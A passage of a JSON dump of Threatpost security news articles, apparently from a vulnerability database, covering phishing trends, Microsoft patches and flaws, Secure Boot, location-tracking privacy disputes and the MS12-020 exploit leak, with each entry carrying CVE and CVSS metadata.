this.\u201d\n\n## Current Events: A Go-To Phishing Hook\n\nBad actors continued to rely on an age-old trick in 2018 for phishing attacks: Using newsworthy events, such as new smartphone launches, [sales seasons](<https://threatpost.com/threatlist-gift-card-themed-bec-holiday-scams-spike/139716/>), [tax deadlines](<https://threatpost.com/fbi-warns-of-spike-in-w-2-phishing-campaigns/130057/>), and the EU General Data Protection Regulation (GDPR) to hook the victim.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12151936/190311-spam-report-2018-1-e1552418397221.png>)\n\nClick to Expand.\n\nPhishing emails purporting to be about GDPR, for instance, boomed [in the first few months](<https://threatpost.com/gdpr-phishing-scam-targets-apple-accounts-financial-data/131915/>) of 2018, because during those months there was an upturn in legitimate GDPR mailings warning users of the transition to the new policies, which require stringent processes to store and process personal data of European citizens.\n\nAttackers unsurprisingly took advantage of this with their own GDPR-related emails: \u201cIt was generally B2B spam \u2014 mostly invitations to paid seminars, webinars, and workshops promising to explain the ins and outs of the new regulation and its ramifications for business,\u201d said researchers.\n\nOther top events, such as the 2018 [FIFA World Cup](<https://threatpost.com/world-cup-vacation-scams-lead-in-phishing-trips-this-summer/132543/>) and the launch of the new iPhone sparked phishing attempts, including emails leading to fake FIFA partner websites for the former, and spam messages purporting to sell accessories and replica gadgets for the latter.\n\n## Cryptocurrency Targets\n\nDespite the cryptocurrency market\u2019s [struggle in 2018](<https://www.cnbc.com/2018/10/12/bitcoin-price-cryptocurrency-market-drops-as-xrp-ethereum-plunge.html>), bad actors\u2019 interest in cryptocurrencies appears far from waning. In fact, scammers utilized a number of methods to capitalize on victims\u2019 interests in the cryptocurrency market, such as posing as a cryptocurrency exchange or fake Initial Coin Offering (ICO) bent on convincing victims into transferring money to cryptocurrency wallets.\n\n\u201cIn 2018, our Anti-Phishing system prevented 410,786 attempts to redirect users to phishing sites imitating popular cryptocurrency wallets, exchanges and platforms,\u201d researchers said. \u201cFraudsters are actively creating fake login pages for cryptocurrency services in the hope of getting user credentials.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12152522/190311-spam-report-2018-7.png>)\n\nClick to Expand.\n\nWhen it came to ICOs, scammers extended invitations to victims for investing in various ICOs via email and social-media posts.\n\nOne such scam targeted a cryptocurrency called buzcoin; the scammers got ahold of the project mailing list and sent fake presale invitations to subscribers before the ICO began \u2013 eventually making away with $15,000, according to Kaspersky Lab.\n\nThere were also sextortion scams that coerced victims to send cryptocurrency in exchange for keeping quiet about their private online activities, with one campaign in July noted for using victims\u2019 [legitimate password](<https://threatpost.com/sextortionists-shift-scare-tactics-to-include-legit-passwords/133960/>) in the email as a scare tactic; and another one in December hit victims with [ransomware](<https://threatpost.com/sextortion-emails-force-payment-via-gandcrab-ransomware/139753/>).\n\nResearchers said they don\u2019t expect attackers\u2019 interests in cryptocurrency to die down any time soon: \u201cIn 2019, spammers will continue to exploit the cryptocurrency topic,\u201d they said. \u201cWe expect to see more fraudulent mailings aimed at both extracting cryptocurrency and gaining access to personal accounts with various cryptocurrency services.\u201d\n\n## Other Tricks\n\nIn 2018, the number of malicious messages in spam was 1.2 times less than in 2017, according to researchers. Of those malicious messages, the most widely distributed malicious objects in email ([Exploit.Win32, CVE-2017-11882](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>)), exploited a patched Microsoft vulnerability that allowed the attacker to perform arbitrary code-execution.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/03/12152819/malware-phishing.png>)\n\nClick to Expand.\n\nDespite this downturn in malicious emails, scammers appear to be looking to other sneaky tactics to avoid detection and still make off with victims\u2019 credentials \u2014 in particular using non-typical formats for spam like ISO, IQY, PIF and PUB attachments.\n\n\u201c2018 saw a continuation of the trend for attention to detail in email presentation,\u201d researchers said. \u201cCybercriminals imitated actual business correspondence using the companies\u2019 real details, including signatures and logos.\u201d\n\nIn addition, bad actors appeared to transition to new channels of content distribution beyond email \u2013 including social media sites, services like [Spotify](<https://threatpost.com/spotify-phishers-hijack-music-fans-accounts/139329/>), or even [Google Translate](<https://threatpost.com/clever-phishing-attack-enlists-google-translate-to-spoof-facebook-login-page/141571/>).\n\n\u201cCybercriminals in 2018 used new methods of communication with their \u2018audience,\u2019 including instant messengers and social networks, releasing wave after wave of self-propagating malicious messages,\u201d said researchers. \u201cHand-in-hand with this, as illustrated by [an] attack on universities, fraudsters are seeking not only new channels, but new targets as well.\u201d\n", "cvss3": {}, "published": "2019-03-12T20:48:20", "type": "threatpost", "title": "ThreatList: Phishing Attacks Doubled in 2018", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2019-03-12T20:48:20", "id": "THREATPOST:0A40F95A480060B254A1AA6FCF9504B2", "href": "https://threatpost.com/threatlist-phishing-attacks-doubled-in-2018/142732/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:02:33", "description": "[](<https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712/>)LAS VEGAS\u2013Microsoft on Thursday handed out three rather large checks to a trio of security researchers, the largest one\u2013$200,000\u2013going to Vasillis Pappas who won the company\u2019s first [Blue Hat Prize](<https://threatpost.com/three-nations-and-three-different-perspectives-blue-hat-finalists-focus-defense-072612/>) competition for defensive technologies. Pappas\u2019s kBouncer ROP mitigation technology edged out ROP-related submissions from the two other finalists, and will be integrated by Microsoft in the near future.\n\nThe company announced Pappas as the winner of the contest at its annual party at the end of the Black Hat conference here with a splashy American Idol-style reveal, complete with blaring music and a massive confetti shower. Pappas, a PhD candidate at Columbia University, has been focused on the research for his submission for more than a year. His kBouncer technology uses the kernel to enforce restrictions about what processes can do, and prevents anything that looks like return-oriented programming from running.\n\nIn addition to the $200,000 that Pappas won, Ivan Fratric was awarded $50,000 for his ROPGuard technology and Jared DeMott won $10,000 and an MSDN subscription for his /ROP submission. Microsoft officials said they were quite happy with the quality of the submissions for the contest and accomplished their stated goal of identifying innovative defensive technologies.\n\n\u201cRunning the BlueHat Prize contest allowed us insight into a greater number of people who are doing some deep thinking in the areas of security mitigation technology. This not only helps Microsoft find and work with talented people, but the spotlight that we can help shine on all of these contestants will hopefully help them market their ideas and talent so that the entire security industry can benefit and improve,\u201d [Katie Moussouris of Microsoft](<https://blogs.technet.com/b/ecostrat/archive/2012/07/26/the-bluehat-prize-v1-0-and-the-winners-are.aspx?Redirected=true>) said in a blog post on the contest.\n\nMicrosoft officials have said repeatedly in the lest few years that the company does not plan to offer bug bounties to security researchers who discover vulnerabilities in Microsoft products. Google, Mozilla and several other companies have such programs, and the Blue Hat prize was Microsoft\u2019s way of responding and attempting to focus the energy of researchers on defensive technologies instead of finding bugs.\n\n\u201cOne thing is certain \u2013 we will continue to invest in security defense at Microsoft, and we will continue to offer cash incentives to the security community for helping Microsoft, and the rest of the industry, to help improve the state of security for the entire ecosystem. In sports, as in life, a great team understands both offense and defense. To address the security threats of today and tomorrow, we as an industry need to appreciate both,\u201d Moussouris said.\n\n \n\n", "cvss3": {}, "published": "2012-07-27T13:57:41", "type": "threatpost", "title": "Vasillis Pappas Wins $200,000 Microsoft Blue Hat Prize", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:47", "id": "THREATPOST:44C93D75841336281571380C5E523A23", "href": "https://threatpost.com/vasillis-pappas-wins-200000-microsoft-blue-hat-prize-072712/76857/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:40", "description": "[](<https://threatpost.com/new-unpatched-flaw-surfaces-sql-server-090209/>)There is an unpatched flaw in Microsoft SQL Server that could enable an attacker to access users\u2019 passwords on the database server. The vulnerability is in SQL Server 2000, 2005 and 2008.\n\nThe SQL Server vulnerability was discovered last fall by database-security vendor Sentrigo, which then reported the problem to Microsoft. But the software giant did not consider the problem serious enough to warrant a patch, Sentrigo officials said, so the weakness has remained unpatched for nearly a year. Sentrigo has released a [free software tool](<http://www.sentrigo.com/passwords>) that will address the problem, though it does not patch the vulnerability.\n\nThe tool, called Passwordizer, erases the cleartext passwords from the database server.\n\nIn a statement, Microsoft officials said the company is not planning to patch the flaw and does not see it as a problem that requires a security update.\n\nThe flaw lies in the way that SQL Server handles user passwords. By looking at the process memory, an administrator can see other users\u2019 passwords in cleartext. However, in order to see the process memory dump, a user would have to have administrator rights already, a condition that limits the severity of the bug.\n\n\u201cDevelopers go to great lengths to ensure passwords are not even transmitted in clear text (for example at the time of login), let alone stored in a readable form. Users have come to expect that their personal passwords, are exactly that \u2013personal \u2013 and that not even administrators can see them. Exploiting this vulnerability, an administrator will be able to see the passwords of users and applications that have connected to SQL Server, all the way back to the last restart,\u201d said Slavik Markovich, CTO of Sentrigo. \u201cWe respectfully disagree with Microsoft\u2019s view that since it requires administrative privileges, the risk is mitigated. Even if you trust your admins, there are plenty of hackers capable of gaining escalated privileges, who could now easily access other systems across the network using these passwords.\u201d\n\nThe flaw can be exploited remotely in SQL Server 2000 and 2005, but in SQL Server 2008 Microsoft made a change to make it more difficult for administrators to access the memory, so an attacker would need local access to the machine in that case.\n", "cvss3": {}, "published": "2009-09-02T12:30:49", "type": "threatpost", "title": "New Unpatched Flaw Surfaces in SQL Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:44", "id": "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "href": "https://threatpost.com/new-unpatched-flaw-surfaces-sql-server-090209/73026/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:07:49", "description": "[](<https://threatpost.com/end-support-xp-sp2-end-era-051310/>)Microsoft\u2019s announcement this week that it is preparing to [end support for machines running Windows XP SP2](<http://windows.microsoft.com/en-us/windows/help/end-support-windows-xp-sp2-windows-vista-without-service-packs?os=other>) not only represents a challenge for the thousands of businesses still running SP2, but also is the end of an era for both Microsoft and its customers.\n\nBy the time Microsoft drops support for XP SP2 on July 13, Windows XP will be nearly nine years old. The OS was released in August 2001 as a replacement for Windows 2000 and was the last full release of Windows before Microsoft started its Trustworthy Computing effort. Very soon after the famous memo from Bill Gates appeared, attention both inside and outside the company focused on hardening Windows XP.\n\nThe first release of Windows XP was not seen as much of a security upgrade over Windows 2000, and it became clear fairly quickly that it was going to need some serious help. And soon. Windows XP had a firewall installed with it, but it was turned off by default and wasn\u2019t obvious to a lot of users. \n\nWith Service Pack 2 Microsoft set out to fix that and add a number of other security protections, as well. It wasn\u2019t until 2004 that the final release of XP SP2 actually hit the streets. But when it did, it represented a huge step forward in security for Windows users. It wasn\u2019t necessarily the feature set that mattered as much as the fact that the protections were enabled by default and taken out of the users\u2019 hands.\n\nNot only did XP SP2 turn on the Windows Firewall by default, which was a major upgrade. But the service pack also added hardware support for DEP (Data Execution Prevention), an important defense against buffer overflow attacks. This was at a time when worms such as Code Red, Nimda and others were tearing through networks around the world, exploiting memory vulnerabilities and paralyzing systems. \n\nThe combination of these security features and the addition of the Windows Security Center, which gave users a dashboard-type view of the status of their antivirus software, firewall and other protections, was a milestone in desktop security. Microsoft has continued to add security features to subsequent releases of Windows, but XP SP2 was the one that started it all.\n\nAnd now, Microsoft is ending support for XP SP2, as well as for Windows 2000, a move that\u2019s been anticipated for some time. (The company will still support SP3 for Windows XP.) It\u2019s a decision that likely has as much to do with the company\u2019s interest in having customers upgrade to a new version of Windows\u2013or even a new machine entirely\u2013as it does with the practical considerations of continuing to provide patches and tech support for outdated OS versions. But that doesn\u2019t make it any less problematic for organizations that have plenty of XP machines happily humming along.\n\nAs [Byron Acohido points out](<http://lastwatchdog.com/microsoft-security-support-windows-xp-service-pack/>), this is not an insignificant problem. \n\n\u201cSuch desktop PCs and servers are still widely used in corporate \nnetworks globally. And as anyone paying attention knows, infected PCs in corporate \nsettings are in [high \ndemand ](<http://lastwatchdog.com/brazil-india-move-top-5-nations-generating-malicious/>)by cyber gangs controlling the botnets driving all forms of \ncybercrime. Botnets are used to spread spam, steal data, hijack online \nbank accounts, commit click fraud and conduct denial-of- service \nattacks for extortion or political reasons,\u201d Acohido writes.\n\nOlder machines often are prime targets for attackers, who know that these PCs are less likely to be fully updated. But they\u2019re just as valuable to botmasters, spammers and other attackers as newer PCs are. A win is a win, regardless of the victim\u2019s age.\n\nFor Microsoft and its customers, the end of support for XP SP2 is the end of the beginning of Microsoft\u2019s security initiative. \n", "cvss3": {}, "published": "2010-05-13T18:04:39", "type": "threatpost", "title": "End of Support for XP SP2 is End of an Era", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T12:47:01", "id": "THREATPOST:02A26476FD54111CFB779DB36CA0BE95", "href": "https://threatpost.com/end-support-xp-sp2-end-era-051310/73965/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:47", "description": "[](<https://threatpost.com/microsoft-defends-secure-boot-windows-8-092311/>)Microsoft officials are seeking to assuage concerns that its implementation of UEFI in Windows 8 will prevent users from loading non-Microsoft operating systems or applications on their machines. Despite concerns raised by security researchers and open-source advocates about vendor lock-in and other issues arising from the use of a secure boot sequence in the upcoming OS, Microsoft says \u201cthe customer is in control of their PC.\u201d\n\nIn the days since Microsoft began talking about the details of Windows 8 and the security measures that it has added to the new version of the OS, security researchers and others have raised questions about the consequences of the implementation of the secure boot sequence that includes UEFI instead of a traditional BIOS underneath the firmware. The boot sequence for Windows 8, which is due in 2012, will be markedly different from that of its predecessors. The most notable difference is that the firmware will only load code that is signed and authenticated by a key that\u2019s embedded in the PC hardware. Any module that isn\u2019t signed won\u2019t be loaded.\n\nThe goal of this is to prevent malware such as rootkits and bootkits from staying resident on machines and reloading each time the machine is restarted. Such malware variants have become more popular in recent years as attackers have looked for new methods of keeping their attack tools on infected machines for a long period of time. That kind of malware can be difficult to detect and remove, and so Microsoft is hoping that the secure boot sequence using UEFI will help prevent it and other malicious software from making its way onto the PC in the first place.\n\n\u201cIn most PCs today, the pre-operating system environment is vulnerable to attacks by redirecting the boot loader handoff to possible malicious loaders. These loaders would remain undetected to operating system security measures and antimalware software,\u201d Microsoft\u2019s [Tony Mangefeste](<https://blogs.msdn.com/b/b8/archive/2011/09/22/protecting-the-pre-os-environment-with-uefi.aspx>) wrote in a post explaining the architectural change.\n\nHowever, critics have raised concerns that the system also gives Microsoft the ability to prevent users from running third-party operating systems such as Linux on their PCs. Ross Anderson, a security researcher at the University of Cambridge, said in a blog post yesterday that the move by Microsoft could have serious consequences.\n\n\u201cThe extension of Microsoft\u2019s OS monopoly to hardware would be a disaster, with increased lock-in, decreased consumer choice and lack of space to innovate. It is clearly [unlawful](<http://en.wikipedia.org/wiki/Article_82>) and must not succeed,\u201d Anderson wrote.\n\nMangefeste said that the secure boot sequence is designed to prevent malware from loading and not to stop users from loading other software they want to run, including alternate operating systems.\n\n\u201cAt the end of the day, the customer is in control of their PC. Microsoft\u2019s philosophy is to provide customers with the best experience first, and allow them to make decisions themselves. We work with our OEM ecosystem to provide customers with this flexibility. The security that UEFI has to offer with secure boot means that most customers will have their systems protected against boot loader attacks. For the enthusiast who wants to run older operating systems, the option is there to allow you to make that decision,\u201d Mangefeste wrote.\n\n\u201cA demonstration of this control is found in the Samsung tablet with Windows 8 Developer Preview that was offered to //BUILD/ participants. In the screenshot below you will notice that we designed the firmware to allow the customer to disable secure boot. However, doing so comes at your own risk.\u201d\n", "cvss3": {}, "published": "2011-09-23T15:14:43", "type": "threatpost", "title": "Microsoft Defends Secure Boot in Windows 8", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:43", "id": "THREATPOST:7D2F975F60C58181C3B6726E809F10FD", "href": "https://threatpost.com/microsoft-defends-secure-boot-windows-8-092311/75683/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:14", "description": "If there\u2019s one key message coming through all of the noise at the RSA Conference this week it\u2019s the fact that there\u2019s a pressing need for more data. Data on attacks, data on vulnerabilities, data on data breaches, data on software security, data on everything having to do with security. The mini-movement that has sprung up around metrics and measurement in security has taken over a lot of the conversation at the conference, with some interesting results.\n\nSeveral different panels and talks have addressed the metrics problem from a variety of angles, with the consensus being that there just simply isn\u2019t enough good data available in most parts of the industry. The last few years have seen a marked increase in the amount of data avilable on some topics, especially data breaches, but those are still the exceptions rather than the rule. In a panel Wednesday morning, four experts with disparate backgrounds said that a big part of the problem is that it\u2019s not clear what should be measured or how.\n\nEven Microsoft, which has been looking at this problem for several years, doesn\u2019t have a clear answer. Adam Shostack, a security program manager at Microsoft, said the company has good systems in place for measuring vulnerability counts and patch counts, but is still working on how to get the most out of those numbers.\n\n\u201cThe one thing we know is that our customer would like fewer updates and more secure software,\u201d he said during the panel discussion, which also included Gary McGraw of Cigital, Matt Blaze of the University of Pennsylvania and Elizabeth Nichols of PlexLogic. \u201cThat\u2019s the primary metric that we work off of.\u201d\n\nMcGraw, who has been working on measuring software security and internal software security programs for several years, said that even the organizations doing the best job with those programs have a tough time getting the most out of their measurement efforts. But the key thing is, at least they\u2019re doing the measurements. The vast majority of software makers and other companies that produce their own custom applications aren\u2019t even taking that step.\n\n\u201cA lot of people are selling highly flammable software. There\u2019s no one who isn\u2019t because people don\u2019t know how to build secure software,\u201d Blaze said.\n", "cvss3": {}, "published": "2009-04-22T19:52:40", "type": "threatpost", "title": "Experts call for better measurement of security", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:23", "id": "THREATPOST:21439BDD06D57894E0142A06D59463B5", "href": "https://threatpost.com/experts-call-better-measurement-security-042209/72562/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:33", "description": "Microsoft announced Thursday that it plans to release four bulletins next week as part of the year\u2019s first batch of [Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2014/01/09/advance-notification-service-for-the-january-2014-security-bulletin-release.aspx>), none of which are rated critical.\n\nDespite the relatively light load, the patches do address a [zero-day vulnerability in Windows XP and Windows Server 2003](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) made public in early November. Hackers were actively exploiting the [flaw in the ND Proxy driver that manages Microsoft\u2019s Telephony API](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) on XP via infected PDF attachments. Exploits work only in conjunction with an Adobe Reader vulnerability that has since been patched.\n\nIn addition to Microsoft patches, expect a fresh batch of Adobe patches as well as Oracle\u2019s quarterly Critical Patch Update, which is generally a massive patch rollout that now includes Java patches.\n\nThe Microsoft bulletins will address vulnerabilities in Windows, Office and Dynamics AX, all which Microsoft has deemed important, including the zero-day fixes.\n\n\u201cIt\u2019s only rated important for a variety of reasons, including the fact that Microsoft will end support for XP in April,\u201d said Russ Ernst, a director of product management at Lumension. \u201cIf you\u2019re still using XP, this will be an important patch to deploy. And, hopefully you are working on your migration plan.\u201d\n\nAccording to a post on Microsoft\u2019s Security Response Center blog by Dustin Childs, MS14-002, will address the zero day, and he acknowledged they were working on a patch for the issue \u2013 which stems from a vulnerability in the kernel and allows local privilege escalation and access to the kernel \u2013 back in December.\n\n\u201cWe have only seen this issue used in conjunction with a PDF exploit in targeted attacks, and not on its own,\u201d Childs said.\n\nMicrosoft has used the zero-day vulnerability as a prime opportunity to urge [Windows users to migrate off XP](<http://threatpost.com/microsoft-xp-end-of-life-an-important-security-milestone/102789>). The company previously announced its plans to effectively end support for the operating system on April 8.\n\nThe first bulletin will address a remote code execution in Microsoft\u2019s Sharepoint Server and Microsoft Word, the third will fix an elevation of privilege in Windows 7 and Server 2008 R2 and the last bulletin will fix a denial of service (DoS) issue in Microsoft\u2019s enterprise resource planning software, Dynamics AX.\n\nPer usual Microsoft will push updates for the software in question next Tuesday and post patch analysis and deployment guidance on its Security Response Center blog.\n", "cvss3": {}, "published": "2014-01-09T13:02:31", "type": "threatpost", "title": "Microsoft to Patch Zero Day in January 2014 Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-01-14T19:04:09", "id": "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "href": "https://threatpost.com/microsoft-expected-to-patch-xp-zero-day-on-patch-tuesday/103591/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:09:09", "description": "Microsoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting; and enabling DEP (Data Execution Protection) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will autoatically enable DEP.\n\n\n\nMicrosoft has acknowledged a new unpatched vulnerability in Internet Explorer 6 and 7, and said that the company is investigating methods for fixing the flaw.\n\nThe company said that although there is public exploit code available for the vulnerability, it has not seen any evidence of ongoing attacks against the IE flaw yet. Experts said that the exploit code for the vulnerability, which was published on Friday on Bugtraq, was unreliable. However, researchers at IBM ISS\u2019s X-Force said on Monday that they had developed a reliable exploit of their own for the flaw.\n\nIn its advisory on the IE flaw, Microsoft said that the weakness affects IE6 and IE7 running on Windows XP, Windows Server 2003, Windows Vista and Windows Server 2008. The vulnerability does not affect Windows 7, the company\u2019s newest release, or IE8, the latest version of the browser. Microsoft also said that running IE7 in Protected Mode, which limits some of its functionality, on Windows Vista, mitigates some of the effects of the vulnerability.\n\n\u201cAt this time, we are aware of no attacks attempting to use this vulnerability against Internet Explorer 6 Service Pack 1 and Internet Explorer 7. We will continue to monitor the threat environment and update this advisory if this situation changes. On completion of this investigation, Microsoft will take the appropriate action to protect our customers, which may include providing a solution through our monthly security update release process, or an out-of-cycle security update, depending on customer needs,\u201d Microsoft said in its advisory.\n\nThe next monthly patch release from Microsoft is due Dec. 8. Until a patch is available, Microsoft suggests several actions that could help mitigate the vulnerability, including setting IE to prompt you before it runs ActiveX controls or active scripting; and enabling DEP (Data Execution Protection) in IE7. To enable DEP, go to the Tools menu, click on Internet Options and then on the Advanced tab. Select the check box for \u201cEnable memory protection to help mitigate online attacks.\u201d\n\nMicrosoft also has published a FixIt tool that will automatically enable DEP.\n", "cvss3": {}, "published": "2009-11-24T14:39:50", "type": "threatpost", "title": "Microsoft Acknowledges IE7 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2018-08-15T14:04:18", "id": "THREATPOST:0FEEF48E09B4F6AB583220AF2A1CCE70", "href": "https://threatpost.com/microsoft-reconoce-falla-en-ie-7-112409/73159/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:04:45", "description": "Redmond, Washington software giant, Microsoft, and Detroit based GM subsidiary, OnStar backtracked on policies widely seen as egregious privacy violations following lawsuits and public outcry. Here\u2019s the news:\n\n**Windows Phone Update Requires User Consent For Tracking**\n\nMicrosoft released their \u201cMango\u201d update, which, according to a report by Tom Warren on [Winrumors](<http://www.winrumors.com/windows-phone-7-5-no-longer-accesses-location-data-without-authorization/>), updates the Windows Phone, addressing widespread accusations and [a related lawsuit](<https://threatpost.com/class-action-lawsuit-accuses-microsoft-illegal-geotagging-090211/>) that the company had been tracking device locations without reasonable consent.\n\nIn a location and privacy FAQ on the Microsoft website, the company staunchly claims that the location information stored within the Windows Phone 7 devices is intended to gather information about nearby Wi-Fi access points and provide users with location based services more efficiently and effectively; this information does not uniquely identify or track devices, they say.\n\nHowever, the company also says they discovered that some of that information had been periodically relayed back to Microsoft when users access the camera application and use its US-English voice command feature. (Whoops!) This relay of information, Microsoft claims, is an unintended behavior. The latest update resolves these and other issues. Now users will have to agree if they want to the Camera application to tag photo location. Voice Command will no longer request location information at all.\n\nFor more information, read the FAQ [here](<http://www.microsoft.com/windowsphone/en-us/howto/wp7/web/location-and-my-privacy.aspx>).\n\n**OnStar Won\u2019t Force Automated Location Tracking**\n\nOnStar found itself in a similar situation after it was discovered that the vehicle navigation and emergency notification service was to begin [monitoring the speed and location of vehicles](<https://threatpost.com/onstar-track-speed-location-cars-even-after-opting-out-092111/>) equipped with OnStar technology on December 1, even if those owners decided to opt-out or cancel OnStar\u2019s services.\n\nA press release published yesterday on the OnStar website announced that the company is revising their proposed terms and conditions to make it clear that customer data will not be collected after a customer cancels their OnStar service.\n\n\u201cWe realize that our proposed amendments did not satisfy our subscribers,\u201d OnStar President Linda Marshall said in the statement. \u201cThis is why we are leaving the decision in our customers\u2019 hands. We listened, we responded and we hope to maintain the trust of our more than 6 million customers.\u201d\n\nThe appearance of GPS and other location tracking technologies in mobile phones, cars and other devices has [raised concerns among privacy and civil liberties advocates in the U.S. and elsewhere](<https://threatpost.com/location-based-services-raise-privacy-security-risks-082510/>). An analysis by the Wall Street Journal found that iPhones running version 4 of the company\u2019s iOS operating system appeared to [track a user\u2019s location and movement](<https://threatpost.com/report-iphones-track-movement-even-location-services-disabled-042511/>) of whether the user enabled or disabled location tracking. Like Microsoft, Apple claimed that the phones weren\u2019t tracking specific users\u2019 movements, just using the company\u2019s huge user base to assemble an accurate list of active cell phone towers and WiFi hotspots. Software vendors, also, have been discovered to be collecting location data, often quite apart from the kind of service they are providing. In just one example, the mobile phone application for the Pandora music streaming service was [found to be harvesting user location data](<https://threatpost.com/pandora-mobile-app-transmits-gobs-personal-data-040611/>). \n\nSecurity experts have wondered, aloud, [how else the company might use the location and movement data that is collected](<https://threatpost.com/iphones-location-and-threats-your-assets-042711/>), including how it might be used by third party advertisers. \n", "cvss3": {}, "published": "2011-09-28T18:07:32", "type": "threatpost", "title": "Blowback: Microsoft, OnStar Pump the Brakes on Location Tracking", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:07:09", "id": "THREATPOST:6E270592F88355DEABA14BF404C7EDDE", "href": "https://threatpost.com/blowback-microsoft-onstar-pump-breaks-implicit-gps-tracking-092811/75700/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:30", "description": "[](<https://threatpost.com/ms12-020-rdp-code-leak-mystery-deepens-microsoft-remains-silent-031612/>)Microsoft has a big, ugly problem on its hands. The company is caught in the middle of what\u2019s rapidly become a major controversy centered on the leak of proof-of-concept [exploit code for the MS12-020 RDP vulnerability](<https://threatpost.com/ms12-020-rdp-exploit-found-researchers-say-code-may-have-leaked-security-vendor-031612/>). Many researchers, including the one who first discovered the bug and reported it to Microsoft through the Zero Day Initiative, believe that the software giant has a leak, either within its own walls in Redmond, or somewhere in its MAPP information-sharing program.\n\nThere are a number of possible explanations for the appearance of the exploit code on a Chinese download site. As odd as it may sound, the absolute best-case scenario for Microsoft is that the code was inadvertently leaked by one of the members of the MAPP (Microsoft Active Protections Program) community. If that\u2019s the case, then it simply means that one (or possibly more) of the MAPP partners was careless with the information Microsoft shared with them and the code somehow got into the wrong hands. That\u2019s not good, but it\u2019s not fatal.\n\nThe second possibility is that someone working at one of the [MAPP companies](<http://www.microsoft.com/security/msrc/collaboration/mapp.aspx>) deliberately posted the code. The MAPP program includes several dozen security and antimalware companies from around the world, and although those companies have signed NDAs and should restrict access to the MAPP info to a small group of people within their organizations, it\u2019s possible that there\u2019s a rogue employee somewhere along the line who could have done this. \n\nMoving up the scale of relative badness, a third scenario would be that someone at ZDI leaked the exploit code, either deliberately or accidentally. ZDI has been buying bugs from researchers and forwarding the data on to affected vendors for several years now, and there hasn\u2019t been any acknowledged incident linked to exploit code from the company or one of its affiliated researchers finding its way into the public domain. Once the company confirms that a bug is exploitable and has signatures ready for its customers, it then sends the data in encrypted form to the affected vendors and is pretty much out of the process from there on out. And, there\u2019s evidence 